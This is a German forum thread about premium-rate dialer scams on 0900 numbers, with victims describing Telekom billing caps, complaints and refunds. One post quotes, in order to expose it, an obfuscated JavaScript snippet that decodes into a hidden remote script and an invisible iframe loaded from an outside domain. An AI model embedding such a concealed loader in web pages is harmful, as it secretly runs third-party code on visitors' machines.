HILFE DIALER über 090090000958

Hallo nochmal,

deine Asuführungen sind sehr erhellend. Zwei Dinge interessieren mich jetzt aber trotzdem noch. Du schreibst, dass möglicherweise die Nummer 060 noch offen ist, die anderen aber unter die hier schon mehrfach genannte Regelung fallen. Laut Datenbank der Regulierungsbehörde ist das aber dreimal derselbe Dialer (sexfiles.exe), registriet auf die gleichen Leute resp. Firmen. Worauf gründet sich Deiner Ansicht nach die Selektivität des obengenannten Vorgehens bei der T-Kom - Gabs vielleicht zu wenig Beschwerden bei der letzten Nummer?
Zweite Frage: Einige hier im Forum berichten von astronomischen Telefonrechnungen, die den Rahmen der von Dir genannten 250 Euro doch erheblich sprengen. Wenn ich die Leute richtig verstanden habe, "dialen" die sonst nicht. Die Beiträge sind auch nocht nicht so alt, dass sie vor dem Inkrafttreten der Regelung gepostet wurden. Was ist da los?

Jetzt noch was am Rande:

Wenn ich das Forum bzw. diesen Thread hier so sehe, scheinen sich da doch vorwiegend Leute zu tummeln, die um "eigene Schadensbegrenzung" bemüht sind. Da fühle ich mich nicht als Ausnahme. Nur wär's dann eben von den Leuten mit einem eher "akademischen" Interesse an solchen Sachverhalten besser - so wie Du das löblicher Weise getan hast - mit präzisen Informationen auszuhelfen.


In diesem Sinne
MfG
Bodo

P.S. Wenn ich mich hier registriere, darf ich dann auch als Benutzer "Bodo" heißen? Das System sagt, der Name sei schon vergeben...
 
galdikas schrieb:
Die Wiedergabe persönlicher Daten ist nur mit ausdrücklicher Genehmigung der betreffenden Person erlaubt.

Die Nennung von ...... und ...... geschieht in völliger Übereinstimmung mit der Abmachung, mit ausdrücklicher Genehmigung der betreffenden Personen zu deren Bezeichnung ihren Namen zu benutzen.

gal.

Hi Gal,

von .... und ..... liegen uns keinerlei Genehmigungen vor, die uns erlauben, ihre Namen hier zu nennen. Und nur das zählt hier für uns und nicht was du denkst bzw. meinst.

MfG BenTigger
 
Hi gal.
Ich verstehe gerade die Rumdiskutiererei hier nicht. Bei jedem Posten hier im Forum kannst Du glasklar lesen:
Sie erklären mit der Nutzung dieses Forums Ihr Einverständnis mit den Nutzungsbedingungen. Ihre IP-Adresse wird in der Datenbank gespeichert sobald Sie einen Artikel abschicken. Sofern Sie durch Ihren Artikel gegen die geltende Rechtslage verstoßen, kann diese IP-Adresse zur Durchsetzung rechtlicher Ansprüche an Dritte weitergegeben werden.

In den Nutzungsbedingungen ist ebenfalls glasklar formuliert, was in diesem Forum hier zulässig ist und was nicht.
Was ist daran so schwer, sich daran zu halten?

Wir haben Wichtigeres zu tun, als hier derartige Debatten zu führen. Die NUB´s gelten für alle. Punkt!
Wem das nicht gefällt, der kann sich gern eine andere Spielwiese suchen...
 
Das Blatt hat sich zum Glücklichen gewendet

Hallo Forum,

gut das es Euch gibt. Ich war über die 957+958 mit ca. 930 € betroffen. Die Lastschrift hatte ich letzte Woche nochmals zurückgegeben und habe eine Begründung an die T-COM gesendet. Ein freundlicher Anruf der Mitarbeiterin in Kassel erklärte mir, dass man die Sache nochmals 60 Tage aus Kulanz zurückstelle, da in Zusammenarbeit mit der RegTP etwas im Gang sei. Heute erreichte mich ein Brief der T-COM. Neben dem allgemeinen Hinweis wg. Mehrwertdiensten stand in dem Schreiben folgender Wortlaut: "Wir haben den von ihnen vorgetragenen Sachverhalt sorgfältig geprüft. Dabei ergaben sich Anhaltspunkte dafür, dass es sich bei dem angebotenen Dienst um ein unseriöses Angebot handelt. Dann in Fettschrift: Wir werden Ihnen daher die Forderung ohne Anerkennung einer Rechtspflicht erstatten und den Betrag Ihrem Buchungskonto gutschreiben".

Ich hoffe, dass die Sache damit aus dem Weg ist. Ohne dieses Forum wäre dieser Stein nie ins Rollen gekommen. Danke an Euch.

Gruß
Marcel
 
Bimbo schrieb:
Zwei Dinge interessieren mich jetzt aber trotzdem noch. Du schreibst, dass möglicherweise die Nummer 060 noch offen ist, die anderen aber unter die hier schon mehrfach genannte Regelung fallen. Laut Datenbank der Regulierungsbehörde ist das aber dreimal derselbe Dialer (sexfiles.exe), registriet auf die gleichen Leute resp. Firmen.
Drei Nummern, drei Mal ein neues Spiel.

Bimbo schrieb:
Worauf gründet sich Deiner Ansicht nach die Selektivität des obengenannten Vorgehens bei der T-Kom - Gabs vielleicht zu wenig Beschwerden bei der letzten Nummer?
Das könnte sein, Beschwerden sind in erster Linie Information - hier fehlte es am Informationsfluss.

Bimbo schrieb:
Zweite Frage: Einige hier im Forum berichten von astronomischen Telefonrechnungen, die den Rahmen der von Dir genannten 250 Euro doch erheblich sprengen. Wenn ich die Leute richtig verstanden habe, "dialen" die sonst nicht.
Na ja, so astronomisch sind dann ein paar hundert Euro doch nicht. Die meisten lagen noch unter der 250-€-Schwellgrenze. Ob das überhaupt der genaue Wert ist, konnte mir die T-Com bislang noch nicht bestätigen.
Aber mit dem "nicht-dialen" hast Do wohl Recht. Ich persönlich kenne sehr viele Nutzer des Internet. Darunter ist nicht ein einziger, der zugibt, wissentlich teure 0900er Dialer zu verwenden. Aus diesem Grund halte ich persönlich diese Abrechnungsform auch nicht für zukunftsicherund vor allem zu problemhaftig.
Man beachte dabei vor allem die Anwendung für Drop-Charge-Dialern im Non-Adult-Bereich (volle Abrechnung ab der ersten Sekunde). Die Typen, die Referate und Hausaufgaben für 30 € verkaufen, rechnen damit, dass ein ziviler Streit, für eine einzige Einwahl, in Bezug auf den erworbenen Inhalt, nur zu selten geführt werden wird. Das ist nicht nur die Katze im Sack, das Viech ist auch noch tot! :evil:
Bei Erotik ist das nochmal was anderes. Allerdings sind 30 € in meiner Stadt auch gut am Straßenstrich angelegt und der machte (mir zumindest früher) mehr Spaß als Bilder gucken, die es auch an der Tanke zum Anfassen gibt.

Bimbo schrieb:
Wenn ich mich hier registriere, darf ich dann auch als Benutzer "Bodo" heißen? Das System sagt, der Name sei schon vergeben...
Dann suche Dir doch einen anderen Namen aus, der Phantasie sind keine Grenzen gesetzt (außer der Name ist schon vergeben).
 
Re: Das Blatt hat sich zum Glücklichen gewendet

beco schrieb:
.... da in Zusammenarbeit mit der RegTP etwas im Gang sei.

Das ist genau das, was ich immer zu erklären versuche - da läuft was hinter den Kulissen!



@ Jessica, falls es Dich hier noch gibt: ... gib´ mal Laut! :lol:
 
Reducal schrieb:
Na ja, so astronomisch sind dann ein paar hundert Euro doch nicht. Die meisten lagen noch unter der 250-€-Schwellgrenze. Ob das überhaupt der genaue Wert ist, konnte mir die T-Com bislang noch nicht bestätigen.
Kann ich bestätigen, - bei exakt 250 € (ohne Umsatzsteuer) wurde die Mehrwertorgie gestoppt. Sonst hätte ich eine Rechnung von ein paar Tausend € gehabt :evil:
Daher wundert es mich auch, daß es immer wieder Leute gibt, die einen höheren Schaden haben. Gibt es eigentlich eine (rechtliche) Grundlage dafür? Oder ist es nur "freiwillige" Schutzmaßnahme der Telekom?
 
Qoppa schrieb:
Oder ist es nur "freiwillige" Schutzmaßnahme der Telekom?
Freiwillig angewendeter Verbraucherschutz oder besser Selbstschutz. Die die T-Com muss sich ja nach solchen Orgien mit ihrem Kunden rumstreiten und werbewirksam sind solche Auswüchse auch nicht.
 
bundesrecht.juris.de schrieb:
...kann der Kunde gegenüber dem Anbieter von Telekommunikationsdienstleistungen für die Öffentlichkeit vorgeben, bis zu welcher monatlichen Entgelthöhe er die Dienstleistung in Anspruch nehmen will
Wenn das Wörtchen "kann" nicht wär, wäre das Leben halb so schwer!

Das ist wie mit der durch den Endkunden selbst zu beauftragenden Sperrung von Mehrwertnummern oder dem vom Kunden zu beantragenden unverkürzten Einzelverbindungsnachweis.
MEn alles Käse - die "KANN"-Bestimmungen nutzen nur dem, der Kenntnis von ihnen hat. Aber auch das wird man (spätestens in einem strittigen Fall) dem Endkunden noch beibringen. Und da ist es wieder, das Kleingedruckte, das durch die wunderbaren Versprechungen der Werbkampagnien nur noch lästig wahr genommen und dem mündigen Bürger vorgeführt wird, welchen Stellenwert die Psychologie der Verkaufsgespräche heute einnimmt.
 
noch mal dazu

das sollte man jetzt aber wirklich mal klären, ob und - wenn ja - zu welchen Bedingungen die Telekomm bei auflaufenden Mehrwertgebühren die Notbremse automatisch zieht. Es ist ja wohl schon beinahe ein Skandal, dass sie einige Leute ins offene Messer laufen lässt (1200, 900, 500 Euro usw.) und bei anderen nach 250 Euro ein netter Anruf erfolgt und die Sperrung vorgenommen wird. Leider weiß ich von einem Fall in der Bekanntschaft, wo auch jemand mit 500 Euro fällig wurde. Merkwürdig ist auch, dass der Telefonbeamte, der mir von dieser Möglichkeit erzählte (ohne eine konkrete Summe zu nennen) so ganz nebenbei noch einen Schwang vom Sohn seines Nachbarn berichtete, der mal fix eben eine Rechnung von 40 Euro fabriziert habe.
Geht die Telekomm hier nach Pi-Mal-Daumen vor, oder wie muss ich das verstehen. Sorgt man hier vielleicht dafür, dass es für brave T-Com-Kunden nicht ganz so schlimm wird und haut andererseits denen auf die Finger, die viel Call-by-Call telefonieren, oder was wird da gespielt?
Das gibt's doch nicht...

Nochwas: an die Leute mit den hohen Rechnungen: ich darf doch davon ausgehen, dass ihr eure Dialer wirklich NICHT absichtlich runtergeladen habt, gell...
 
@ TSCoreNinja

vielen Dank für die schnelle Antwort, bin leider jetzt erst dazu gekommen sie umzusetzen.
... bei anderen nach 250 Euro ein netter Anruf erfolgt und die Sperrung vorgenommen wird ...
Geht die Telekomm hier nach Pi-Mal-Daumen vor, oder wie muss ich das verstehen.

Ich würde sagen Pi-Mal-Daumen und reichlich unkoordiniert, wenn bei mir ein netter Telekom-Mitarbeiter anruft und mich auf Unregelmäßigkeiten bei meiner Telefonrechnung in Höhe von 20,- € aufmerksamm macht.

Woraufhin ich in der folgenden Abrechnung feststellen musste, dass zum Zeitpunkt dieses Anrufes bereits Gebüren in Höhe von ca. 380,- € aufgelaufen sind. SCHÖNEN DANK AUCH!

Für mich sieht das nicht nach Notbremse oder freiwilligen Selbstschutzes der Telekom aus.

Der aktuelle Stand bei mir:

Brief an die Telekom

und warten...

Halte Euch auf dem laufenden.
 
Wow!

Ich habe heute auch einen Brief vom Telekom gekriegt:

"Wir haben den von ihnen vorgetragenen Sachverhalt sorgfältig geprüft... es sich bei dem angebotenen Dienst um ein unseriöses Angebot handelt. Wir werden Ihnen daher die Forderung ohne Anerkennung einer Rechtspflicht erstatten...".

Das heisst... Victory! 0:)
Und (ich glaube fest) - für alle Betroffenen von 090090000957 und 090090000958!
 
Content Provider/Abrechnungspartner der Daenen

Wen es interessiert, wer evt. an dem hiesigen nicht registrierten Dialern verdient, weil er versteckten/codierten JavaScript aus seiner Webseite plaziert
Code:
<script>var out='', txt='=tdsjqu!tsd>iuuq;00j/sjoh1517919191/ov0kt/qiq@dvtu>53?=0tdsjqu?=jgsbnf!xjeui>3!ifjhiu>3!tuzmf>wjtjcjmjuz  ;ijeefo!tsd>iuuq;00j/sjoh1517919191/ov0jgsbnf`to/qiq@dvtu>53?=0jgsbnf?'; 
 for (i=0; i < txt.length; i++) { octet = txt.charCodeAt(i); out+= String.fromCharCode(octet-1);} 
 document.write(out);</script>

Diese Webseite ist registriert auf eine Firma aus den Bahamas.


Fidul hat diese Firma mal im Antispam Forum erwaehnt:
Fidul schrieb:
An wen wurde denn diese Domain versteigert? Doch nicht etwa an Albert * D****, Ultima Network Corp., 55 Frederick St. P.O. Box CB, 13039 Nassau, Bahamas?

DOEDel, dann sag' dem Albert mal, daß er die Denic-Einträge für sex-und-ficken.** und sexcrackerz.** schleunigst korrigieren soll. Da gelten andere Regeln als für .com und .net wie etwa handy-kontakte.***, sexflatrate.*** und sms-sofort.***. Tip: DENIC-Registrierungsbedingungen §3, Absatz 1. Dieser Service ist gratis.

Vielleicht kann er ein bisschen mehr dazu sagen...
Gr,
TSCN
 
Codiertes Scriptgerödel kann man besser im Klartext lesen, siehe Bild.

Dietmar Vill
 

Anhänge

  • doedel.jpg
    doedel.jpg
    109,7 KB · Aufrufe: 252
@Fidul:
Link zum Thread

@DVill
;) ich benutz fuer so etwas immer Rhino (javascript engine von Mozilla), wollte aber nicht die URL posten (steht eh schon im Linkforum). BTW, Douglas Adams hatte mal wieder Recht, die Antwort ist 42, jetzt muesste Jessica auch wissen, wer der boese Junge ist.

Gr,
TSCN
 
090090000958

:p
Hallo,

für alle bei denen auch der Dialer 090090000958 in die bestehende DFÜ Netzwerkverbindung instlliert wurde, hab ich eine gute Nachricht.

Bei mir liefen auch über 400? über 2 Monate auf. Hab bei der Telekom Beschwerde eingelegt und soeben eine Nachricht erhalten, daß die Telekom den Betrag storniert.

Gruß
 
Zurück
Oben